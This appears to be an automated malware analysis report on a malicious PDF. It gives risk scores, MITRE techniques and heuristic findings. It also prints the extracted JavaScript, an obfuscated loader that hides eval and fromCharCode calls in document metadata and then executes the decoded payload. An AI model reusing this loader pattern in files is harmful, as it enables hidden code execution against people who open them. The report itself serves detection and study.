MALICIOUS
114
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
The PDF file contains embedded JavaScript that is obfuscated but appears to leverage String.fromCharCode and potentially exploits a known PDF vulnerability cluster. The script's intent is to execute arbitrary code, likely to download and run a second-stage payload. The ML classifier strongly indicates maliciousness.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 3
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0001_000.js8798c666c5cdfadeb90a5ac5b936355b7ae0011ed7a16e5251a59b998bb0a24c |
pdf-javascript-stream | PDF /JS object 1 at offset 0xFC | 311 bytes |
Preview scriptFirst 1,000 lines of the extracted script
var w = 4;
var ivcsw = this.producer;
var skidw=function(){return {e:this}}().e;
vwunh=skidw[this.subject];
kxoeq=vwunh(this.title);
ivcsw = ivcsw.replace(/t/g,'2');
aaecj = vwunh('['+ivcsw+']');
var s = '';
for (i = 0; i < aaecj.length; i++) {
.eqjbf = aaecj[i];
.s += kxoeq(eqjbf);
}
vwunh(s);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.